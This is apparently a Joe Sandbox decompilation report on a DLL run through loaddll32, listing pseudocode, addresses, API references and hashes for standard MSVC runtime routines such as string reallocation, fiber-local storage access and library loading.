											goto L39;
										} else {
											_t266 = _t228[5];
											_t196 = _t261 + _t282;
											_v16 = _t196;
											_t300 = _t196 | 0x0000000f;
											_v0 = _t266;
											__eflags = _t300 - 0x7fffffff;
											if(__eflags <= 0) {
												_t198 = _t266 >> 1;
												_t242 = 0x7fffffff - _t198;
												__eflags = _t266 - _t242;
												if(__eflags <= 0) {
													_t199 = _t198 + _t266;
													__eflags = _t300 - _t199;
													_t282 =  <  ? _t199 : _t300;
													_t35 = _t282 + 1; // 0x80000000
													_t242 = _t35;
													__eflags = _t242 - 0x1000;
													if(_t242 < 0x1000) {
														__eflags = _t242;
														if(__eflags == 0) {
															_t266 = 0;
															__eflags = 0;
														} else {
															_t213 = E6DA59399(_t266, _t282, __eflags, _t242);
															_t261 = _v12;
															_t321 = _t321 + 4;
															_t266 = _t213;
														}
														goto L32;
													} else {
														_t36 =  &(_t242[8]); // 0x80000023
														_t214 = _t36;
														__eflags = _t36 - _t242;
														if(__eflags <= 0) {
															L39:
															E6DA51420();
															goto L40;
														} else {
															goto L22;
														}
													}
												} else {
													_t282 = 0x7fffffff;
													goto L21;
												}
											} else {
												_t282 = 0x7fffffff;
												L21:
												_t214 = 0x80000023;
												L22:
												_t215 = E6DA59399(_t266, _t282, __eflags, _t214);
												_t321 = _t321 + 4;
												__eflags = _t215;
												if(_t215 == 0) {
													L40:
													E6DA5DACF(_t228, _t242, _t261);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t308);
													_t309 = _t321;
													_t322 = _t321 - 0xc;
													_t262 = _v48;
													_push(_t228);
													_t229 = _t242;
													_t243 = 0x7fffffff;
													_push(_t282);
													_push(_t266);
													_t283 = _t229[4];
													_v60 = _t283;
													__eflags = 0x7fffffff - _t283 - _t262;
													if(__eflags < 0) {
														E6DA514C0(_t229, 0x7fffffff, _t262, __eflags);
														goto L62;
													} else {
														_t266 = _t229[5];
														_t172 = _t283 + _t262;
														_v20 = _t172;
														_t294 = _t172 | 0x0000000f;
														_v4 = _t266;
														__eflags = _t294 - 0x7fffffff;
														if(__eflags <= 0) {
															_t174 = _t266 >> 1;
															_t243 = 0x7fffffff - _t174;
															__eflags = _t266 - _t243;
															if(__eflags <= 0) {
																_t175 = _t174 + _t266;
																__eflags = _t294 - _t175;
																_t283 =  <  ? _t175 : _t294;
																_t65 = _t283 + 1; // 0x80000000
																_t243 = _t65;
																__eflags = _t243 - 0x1000;
																if(_t243 < 0x1000) {
																	__eflags = _t243;
																	if(__eflags == 0) {
																		_t266 = 0;
																		__eflags = 0;
																	} else {
																		_t193 = E6DA59399(_t266, _t283, __eflags, _t243);
																		_t322 = _t322 + 4;
																		_t266 = _t193;
																	}
																	goto L55;
																} else {
																	_t66 = _t243 + 0x23; // 0x80000023
																	_t194 = _t66;
																	__eflags = _t66 - _t243;
																	if(__eflags <= 0) {
																		L62:
																		E6DA51420();
																		goto L63;
																	} else {
																		goto L45;
																	}
																}
															} else {
																_t283 = 0x7fffffff;
																goto L44;
															}
														} else {
															_t283 = 0x7fffffff;
															L44:
															_t194 = 0x80000023;
															L45:
															_t195 = E6DA59399(_t266, _t283, __eflags, _t194);
															_t322 = _t322 + 4;
															__eflags = _t195;
															if(_t195 == 0) {
																L63:
																E6DA5DACF(_t229, _t243, _t262);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t309);
																_t323 = _t322 - 8;
																_push(_t229);
																_t230 = _t243;
																_t244 = 0x7fffffff;
																_push(_t283);
																_t284 = _v68;
																_t263 = _t230[4];
																_v80 = _t263;
																_push(_t266);
																__eflags = 0x7fffffff - _t263 - _t284;
																if(__eflags < 0) {
																	E6DA514C0(_t230, 0x7fffffff, _t263, __eflags);
																	goto L85;
																} else {
																	_t268 = _t230[5];
																	_t151 = _t263 + _t284;
																	_v24 = _t151;
																	_t286 = _t151 | 0x0000000f;
																	_v8 = _t268;
																	__eflags = _t286 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t153 = _t268 >> 1;
																		_t244 = 0x7fffffff - _t153;
																		__eflags = _t268 - _t244;
																		if(__eflags <= 0) {
																			_t154 = _t153 + _t268;
																			__eflags = _t286 - _t154;
																			_t287 =  <  ? _t154 : _t286;
																			_t104 = _t287 + 1; // 0x80000000
																			_t244 = _t104;
																			__eflags = _t244 - 0x1000;
																			if(_t244 < 0x1000) {
																				__eflags = _t244;
																				if(__eflags == 0) {
																					_t269 = 0;
																					__eflags = 0;
																				} else {
																					_t169 = E6DA59399(_t268, _t287, __eflags, _t244);
																					_t263 = _v20;
																					_t323 = _t323 + 4;
																					_t269 = _t169;
																				}
																				goto L78;
																			} else {
																				_t105 = _t244 + 0x23; // 0x80000023
																				_t170 = _t105;
																				__eflags = _t105 - _t244;
																				if(__eflags <= 0) {
																					L85:
																					E6DA51420();
																					goto L86;
																				} else {
																					goto L68;
																				}
																			}
																		} else {
																			_t287 = 0x7fffffff;
																			goto L67;
																		}
																	} else {
																		_t287 = 0x7fffffff;
																		L67:
																		_t170 = 0x80000023;
																		L68:
																		_t171 = E6DA59399(_t268, _t287, __eflags, _t170);
																		_t323 = _t323 + 4;
																		__eflags = _t171;
																		if(_t171 == 0) {
																			L86:
																			_t148 = E6DA5DACF(_t230, _t244, _t263);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_t245 =  *_t244;
																			__eflags = _t245;
																			if(_t245 != 0) {
																				return  *( *_t245)(1);
																			}
																			return _t148;
																		} else {
																			_t263 = _v20;
																			_t102 =  &(_t171[8]); // 0x23
																			_t269 = _t102 & 0xffffffe0;
																			 *(_t269 - 4) = _t171;
																			L78:
																			_t230[4] = _v24;
																			_t230[5] = _t287;
																			_t288 = _t269 + _t263;
																			_v24 = _t288;
																			__eflags = _v8 - 0x10;
																			_v20 = _v0 + _t288;
																			_push(_t263);
																			if(_v8 < 0x10) {
																				_push(_t230);
																				_push(_t269);
																				E6DA5AB10();
																				E6DA5B0A0(_t269, _t288, _a4, _v0);
																				 *_v20 = 0;
																				 *_t230 = _t269;
																				return _t230;
																			} else {
																				_t290 =  *_t230;
																				_push(_t290);
																				_push(_t269);
																				E6DA5AB10();
																				E6DA5B0A0(_t269, _v24, _a4, _v0);
																				_t247 = _v8 + 1;
																				 *_v20 = 0;
																				__eflags = _t247 - 0x1000;
																				if(_t247 < 0x1000) {
																					L82:
																					_push(_t247);
																					E6DA593C9(_t290);
																					 *_t230 = _t269;
																					return _t230;
																				} else {
																					_t263 =  *(_t290 - 4);
																					_t244 = _t247 + 0x23;
																					_t123 = _t290 - _t263 - 4; // 0x7ffffffb
																					__eflags = _t123 - 0x1f;
																					if(_t123 > 0x1f) {
																						goto L86;
																					} else {
																						_t290 = _t263;
																						goto L82;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t63 =  &(_t195[8]); // 0x23
																_t266 = _t63 & 0xffffffe0;
																 *(_t266 - 4) = _t195;
																L55:
																_t229[4] = _v20;
																_t178 = _a4;
																_t229[5] = _t283;
																_v16 = _v16 - _t178 + 1;
																_t295 = _t266 + _t178;
																_v24 = _t295;
																__eflags = _v4 - 0x10;
																_v20 = _a8 + _t295;
																_push(_t178);
																if(_v4 < 0x10) {
																	_push(_t229);
																	_push(_t266);
																	E6DA5AB10();
																	E6DA5B0A0(_t266, _t295, _a12, _a8);
																	__eflags = _t229 + _a4;
																	E6DA5AB10(_v20, _t229 + _a4, _v16);
																	 *_t229 = _t266;
																	return _t229;
																} else {
																	_t297 =  *_t229;
																	_push(_t297);
																	_push(_t266);
																	E6DA5AB10();
																	E6DA5B0A0(_t266, _v24, _a12, _a8);
																	E6DA5AB10(_v20, _a4 + _t297, _v16);
																	_t322 = _t322 + 0x24;
																	_t254 = _v4 + 1;
																	__eflags = _t254 - 0x1000;
																	if(_t254 < 0x1000) {
																		L59:
																		_push(_t254);
																		E6DA593C9(_t297);
																		 *_t229 = _t266;
																		return _t229;
																	} else {
																		_t262 =  *(_t297 - 4);
																		_t243 = _t254 + 0x23;
																		_t283 = _t297 - _t262;
																		_t88 = _t283 - 4; // 0x7ffffffb
																		__eflags = _t88 - 0x1f;
																		if(_t88 > 0x1f) {
																			goto L63;
																		} else {
																			_t297 = _t262;
																			goto L59;
																		}
																	}
																}
															}
														}
													}
												} else {
													_t261 = _v12;
													_t33 =  &(_t215[8]); // 0x23
													_t266 = _t33 & 0xffffffe0;
													 *(_t266 - 4) = _t215;
													L32:
													_t228[4] = _v16;
													_t228[5] = _t282;
													_t301 = _t266 + _t261;
													_v16 = _t301;
													__eflags = _v0 - 0x10;
													_v12 = _a12 + _t301;
													_push(_t261);
													if(_v0 < 0x10) {
														_push(_t228);
														_push(_t266);
														E6DA5AB10();
														E6DA5AB10(_t301, _a8, _a12);
														 *_v12 = 0;
														 *_t228 = _t266;
														return _t228;
													} else {
														_t303 =  *_t228;
														_push(_t303);
														_push(_t266);
														E6DA5AB10();
														E6DA5AB10(_v16, _a8, _a12);
														_t321 = _t321 + 0x18;
														_t256 = _v0 + 1;
														 *_v12 = 0;
														__eflags = _t256 - 0x1000;
														if(_t256 < 0x1000) {
															L36:
															_push(_t256);
															E6DA593C9(_t303);
															 *_t228 = _t266;
															return _t228;
														} else {
															_t261 =  *(_t303 - 4);
															_t242 = _t256 + 0x23;
															_t282 = _t303 - _t261;
															_t52 = _t282 - 4; // 0x7ffffffb
															__eflags = _t52 - 0x1f;
															if(_t52 > 0x1f) {
																goto L40;
															} else {
																_t303 = _t261;
																goto L36;
															}
														}
													}
												}
											}
										}
									} else {
										_t280 = _v20;
										_a4 = _t280;
										_v8 = 1;
										E6DA58A87(__eflags, _t280);
										 *((intOrPtr*)( *_t280 + 4))();
										 *0x6daa5c78 = _t280;
										goto L16;
									}
								} else {
									_t280 = _t226;
									goto L16;
								}
							} else {
								_t280 =  *( *((intOrPtr*)(_t218 + 8)) + _t266 * 4);
								goto L11;
							}
						}
					}
				}
			}

0x6da55d91
0x6da55d93
0x6da55d95
0x6da55da0
0x6da55da1
0x6da55da8
0x6da55dab
0x6da55dac
0x6da55dad
0x6da55db3
0x6da55db8
0x6da55dbf
0x6da55dc5
0x6da55dcb
0x6da55dd0
0x6da55dd6
0x6da55ddb
0x6da55de1
0x6da55de3
0x6da55de8
0x6da55de9
0x6da55dee
0x6da55dee
0x6da55df6
0x6da55dfb
0x6da55dfb
0x6da55e04
0x6da55e0a
0x6da55e18
0x6da55e18
0x00000000
0x6da55e0c
0x6da55e0f
0x6da55e14
0x6da55e70
0x6da55e73
0x6da55e80
0x6da55e8a
0x6da55e16
0x6da55e1a
0x6da55e1e
0x6da55e30
0x6da55e32
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55e20
0x6da55e20
0x6da55e28
0x6da55e34
0x6da55e36
0x6da55e43
0x6da55e48
0x6da55e4b
0x6da55e4e
0x6da55e8b
0x6da55e90
0x6da55e91
0x6da55e92
0x6da55e93
0x6da55e94
0x6da55e95
0x6da55e96
0x6da55e97
0x6da55e98
0x6da55e99
0x6da55e9a
0x6da55e9b
0x6da55e9c
0x6da55e9d
0x6da55e9e
0x6da55e9f
0x6da55ea0
0x6da55ea1
0x6da55ea3
0x6da55ea6
0x6da55ea7
0x6da55ea9
0x6da55eb0
0x6da55eb1
0x6da55eb4
0x6da55eb9
0x6da55ebc
0x6da55ebd
0x6da55ebf
0x6da55fe2
0x00000000
0x6da55ec5
0x6da55ec5
0x6da55ec8
0x6da55ecd
0x6da55ed0
0x6da55ed3
0x6da55ed6
0x6da55ed8
0x6da55f02
0x6da55f04
0x6da55f06
0x6da55f08
0x6da55f11
0x6da55f13
0x6da55f15
0x6da55f18
0x6da55f18
0x6da55f1b
0x6da55f21
0x6da55f30
0x6da55f32
0x6da55f44
0x6da55f44
0x6da55f34
0x6da55f35
0x6da55f3a
0x6da55f3d
0x6da55f40
0x6da55f40
0x00000000
0x6da55f23
0x6da55f23
0x6da55f23
0x6da55f26
0x6da55f28
0x6da55fe7
0x6da55fe7
0x00000000
0x6da55f2e
0x00000000
0x6da55f2e
0x6da55f28
0x6da55f0a
0x6da55f0a
0x00000000
0x6da55f0a
0x6da55eda
0x6da55eda
0x6da55edc
0x6da55edc
0x6da55ee1
0x6da55ee2
0x6da55ee7
0x6da55eea
0x6da55eec
0x6da55fec
0x6da55fec
0x6da55ff1
0x6da55ff2
0x6da55ff3
0x6da55ff4
0x6da55ff5
0x6da55ff6
0x6da55ff7
0x6da55ff8
0x6da55ff9
0x6da55ffa
0x6da55ffb
0x6da55ffc
0x6da55ffd
0x6da55ffe
0x6da55fff
0x6da56000
0x6da56001
0x6da56003
0x6da56006
0x6da56009
0x6da5600a
0x6da5600c
0x6da56011
0x6da56014
0x6da56015
0x6da5601a
0x6da5601d
0x6da5601f
0x6da56165
0x00000000
0x6da56025
0x6da56025
0x6da56028
0x6da5602d
0x6da56030
0x6da56033
0x6da56036
0x6da56038
0x6da5605f
0x6da56061
0x6da56063
0x6da56065
0x6da5606e
0x6da56070
0x6da56072
0x6da56075
0x6da56075
0x6da56078
0x6da5607e
0x6da5608d
0x6da5608f
0x6da5609e
0x6da5609e
0x6da56091
0x6da56092
0x6da56097
0x6da5609a
0x6da5609a
0x00000000
0x6da56080
0x6da56080
0x6da56080
0x6da56083
0x6da56085
0x6da5616a
0x6da5616a
0x00000000
0x6da5608b
0x00000000
0x6da5608b
0x6da56085
0x6da56067
0x6da56067
0x00000000
0x6da56067
0x6da5603a
0x6da5603a
0x6da5603c
0x6da5603c
0x6da56041
0x6da56042
0x6da56047
0x6da5604a
0x6da5604c
0x6da5616f
0x6da5616f
0x6da56174
0x6da56175
0x6da56176
0x6da56177
0x6da56178
0x6da56179
0x6da5617a
0x6da5617b
0x6da5617c
0x6da5617d
0x6da5617e
0x6da5617f
0x6da56180
0x6da56183
0x6da56186
0x6da56187
0x6da56189
0x6da56190
0x6da56191
0x6da56194
0x6da56199
0x6da5619c
0x6da5619d
0x6da5619f
0x6da562c9
0x00000000
0x6da561a5
0x6da561a5
0x6da561a8
0x6da561ad
0x6da561b0
0x6da561b3
0x6da561b6
0x6da561b8
0x6da561e2
0x6da561e4
0x6da561e6
0x6da561e8
0x6da561f1
0x6da561f3
0x6da561f5
0x6da561f8
0x6da561f8
0x6da561fb
0x6da56201
0x6da56210
0x6da56212
0x6da56224
0x6da56224
0x6da56214
0x6da56215
0x6da5621a
0x6da5621d
0x6da56220
0x6da56220
0x00000000
0x6da56203
0x6da56203
0x6da56203
0x6da56206
0x6da56208
0x6da562ce
0x6da562ce
0x00000000
0x6da5620e
0x00000000
0x6da5620e
0x6da56208
0x6da561ea
0x6da561ea
0x00000000
0x6da561ea
0x6da561ba
0x6da561ba
0x6da561bc
0x6da561bc
0x6da561c1
0x6da561c2
0x6da561c7
0x6da561ca
0x6da561cc
0x6da562d3
0x6da562d3
0x6da562d8
0x6da562d9
0x6da562da
0x6da562db
0x6da562dc
0x6da562dd
0x6da562de
0x6da562df
0x6da562e0
0x6da562e2
0x6da562e4
0x00000000
0x6da562ea
0x6da562ec
0x6da561d2
0x6da561d2
0x6da561d5
0x6da561d8
0x6da561db
0x6da56226
0x6da56229
0x6da56236
0x6da56239
0x6da5623e
0x6da56241
0x6da56245
0x6da56248
0x6da56249
0x6da562a0
0x6da562a1
0x6da562a2
0x6da562ae
0x6da562b9
0x6da562be
0x6da562c6
0x6da5624b
0x6da5624b
0x6da5624d
0x6da5624e
0x6da5624f
0x6da5625d
0x6da5626b
0x6da5626c
0x6da5626f
0x6da56275
0x6da56289
0x6da56289
0x6da5628b
0x6da56293
0x6da5629d
0x6da56277
0x6da56277
0x6da5627a
0x6da5627f
0x6da56282
0x6da56285
0x00000000
0x6da56287
0x6da56287
0x00000000
0x6da56287
0x6da56285
0x6da56275
0x6da56249
0x6da561cc
0x6da561b8
0x6da56052
0x6da56052
0x6da56055
0x6da56058
0x6da560a0
0x6da560a6
0x6da560b0
0x6da560b6
0x6da560b9
0x6da560bf
0x6da560c4
0x6da560c7
0x6da560cb
0x6da560ce
0x6da560cf
0x6da56131
0x6da56132
0x6da56133
0x6da5613f
0x6da5614a
0x6da56150
0x6da56158
0x6da56162
0x6da560d1
0x6da560d1
0x6da560d3
0x6da560d4
0x6da560d5
0x6da560e3
0x6da560f4
0x6da560fc
0x6da560ff
0x6da56100
0x6da56106
0x6da5611a
0x6da5611a
0x6da5611c
0x6da56124
0x6da5612e
0x6da56108
0x6da56108
0x6da5610b
0x6da5610e
0x6da56110
0x6da56113
0x6da56116
0x00000000
0x6da56118
0x6da56118
0x00000000
0x6da56118
0x6da56116
0x6da56106
0x6da560cf
0x6da5604c
0x6da56038
0x6da55ef2
0x6da55ef2
0x6da55ef5
0x6da55ef8
0x6da55efb
0x6da55f46
0x6da55f49
0x6da55f4f
0x6da55f52
0x6da55f57
0x6da55f5a
0x6da55f5e
0x6da55f61
0x6da55f62
0x6da55fb9
0x6da55fba
0x6da55fbb
0x6da55fc7
0x6da55fd2
0x6da55fd7
0x6da55fdf
0x6da55f64
0x6da55f64
0x6da55f66
0x6da55f67
0x6da55f68
0x6da55f76
0x6da55f7e
0x6da55f84
0x6da55f85
0x6da55f88
0x6da55f8e
0x6da55fa2
0x6da55fa2
0x6da55fa4
0x6da55fac
0x6da55fb6
0x6da55f90
0x6da55f90
0x6da55f93
0x6da55f96
0x6da55f98
0x6da55f9b
0x6da55f9e
0x00000000
0x6da55fa0
0x6da55fa0
0x00000000
0x6da55fa0
0x6da55f9e
0x6da55f8e
0x6da55f62
0x6da55eec
0x6da55ed8
0x6da55e50
0x6da55e50
0x6da55e53
0x6da55e57
0x6da55e5b
0x6da55e67
0x6da55e6a
0x00000000
0x6da55e6a
0x6da55e38
0x6da55e38
0x00000000
0x6da55e38
0x6da55e2a
0x6da55e2d
0x00000000
0x6da55e2d
0x6da55e28
0x6da55e1e
0x6da55e14

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DA55DB3
std::_Lockit::_Lockit.LIBCPMT ref: 6DA55DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55DF6
std::_Facet_Register.LIBCPMT ref: 6DA55E5B
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55E73
Concurrency::cancel_current_task.LIBCPMT ref: 6DA55E8B

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6a299ef4329989f3533a7c1199db264c6ec07e81a6c4a202aad6dfa1ec827b3f
Instruction ID: 2a45955e83eb01ac66bda62d66dee09002e630c63a6b31342e53290e5afc2422
Opcode Fuzzy Hash: 6a299ef4329989f3533a7c1199db264c6ec07e81a6c4a202aad6dfa1ec827b3f
Instruction Fuzzy Hash: 8431AD7691C216EFCB11CF58C980B7EBBB5FB05324F1A8259D90567241DB30A9A2CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5C471 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6DA5C471(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6da83030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6DA5D66B(_t13, __eflags,  *0x6da83030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6DA5D6A6(_t14, __eflags,  *0x6da83030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6DA5DD0F();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6DA5D6A6(_t18, __eflags,  *0x6da83030, 0);
								} else {
									_t8 = E6DA5D6A6(_t18, __eflags,  *0x6da83030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6DA5DCF4(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6da5c471
0x6da5c478
0x6da5c48b
0x6da5c492
0x6da5c494
0x6da5c495
0x6da5c498
0x6da5c4b1
0x6da5c4b1
0x6da5c49a
0x6da5c49a
0x6da5c49c
0x6da5c4a6
0x6da5c4ad
0x6da5c4af
0x6da5c4b6
0x6da5c4bf
0x6da5c4c2
0x6da5c4c3
0x6da5c4c5
0x6da5c4d9
0x6da5c4d9
0x6da5c4e2
0x6da5c4c7
0x6da5c4ce
0x6da5c4d4
0x6da5c4d5
0x6da5c4d7
0x6da5c4eb
0x6da5c4ed
0x6da5c4ed
0x00000000
0x00000000
0x00000000
0x6da5c4d7
0x6da5c4f0
0x00000000
0x00000000
0x00000000
0x6da5c4af
0x6da5c49c
0x6da5c4f8
0x6da5c502
0x6da5c47a
0x6da5c47c
0x6da5c47c

APIs

GetLastError.KERNEL32(00000001,?,6DA5C382,6DA595C8,6DA59859,?,6DA59A91,?,00000001,?,?,00000001,?,6DA810F8,0000000C,6DA59B8A), ref: 6DA5C47F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DA5C48D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DA5C4A6
SetLastError.KERNEL32(00000000,6DA59A91,?,00000001,?,?,00000001,?,6DA810F8,0000000C,6DA59B8A,?,00000001,?), ref: 6DA5C4F8

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ee44d852379336c50a44c14f1e5ae34640c81de4ecd455577ce9ca1fcca595d1
Instruction ID: 4ee6c118ad92e7c9fc9cb195fc03876a5393b603c3156717d54ea89656f28e5e
Opcode Fuzzy Hash: ee44d852379336c50a44c14f1e5ae34640c81de4ecd455577ce9ca1fcca595d1
Instruction Fuzzy Hash: 3301283612E7225EAF101AF49C88F3627B4DB436797314229EA50841D4EF7548A3D244

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5D512 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA5D512(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6daa556c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6da759c8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6DA62838(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6da5d519
0x6da5d58d
0x6da5d51e
0x6da5d520
0x6da5d527
0x6da5d52b
0x6da5d534
0x6da5d543
0x6da5d54c
0x6da5d550
0x6da5d599
0x6da5d59b
0x6da5d59f
0x6da5d5a2
0x6da5d5a2
0x6da5d5a8
0x6da5d5a8
0x6da5d594
0x6da5d598
0x6da5d598
0x6da5d552
0x6da5d55b
0x6da5d585
0x6da5d588
0x6da5d58a
0x6da5d58a
0x00000000
0x6da5d58a
0x6da5d55d
0x6da5d568
0x6da5d56d
0x6da5d572
0x00000000
0x00000000
0x6da5d579
0x6da5d57f
0x6da5d583
0x00000000
0x00000000
0x00000000
0x6da5d583
0x6da5d530
0x00000000
0x00000000
0x00000000
0x6da5d532
0x6da5d592
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6DA5D5D3,00000000,?,00000001,00000000,?,6DA5D64A,00000001,FlsFree,6DA75A84,FlsFree,00000000), ref: 6DA5D5A2

Strings

api-ms-, xrefs: 6DA5D562

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8ad41ac7a8cc6d171549b65c2a0241383b64122b521629af2423ce535b8c020c
Instruction ID: 646d2a758a74ea1050b64cf5f7a172ec631c11e4be94b2c0beaa59ff3c01598e
Opcode Fuzzy Hash: 8ad41ac7a8cc6d171549b65c2a0241383b64122b521629af2423ce535b8c020c
Instruction Fuzzy Hash: AB11C47AA4D732ABDF228B68CC4075D33B4AF47764F194120E912AB280D7B0E991CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA61632 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6DA61632(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6da83014; // 0xa0d58914
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6DA7277B, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6da7415c(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x6da61647
0x6da61652
0x6da61658
0x6da6165c
0x6da61667
0x6da6166f
0x6da61679
0x6da6167f
0x6da61683
0x6da6168a
0x6da61690
0x6da61690
0x6da61683
0x6da61696
0x6da6169b
0x6da6169b
0x6da616a4
0x6da616ae

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A0D58914,?,?,00000000,6DA7277B,000000FF,?,6DA615C2,?,?,6DA61596,00000016), ref: 6DA61667
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DA61679
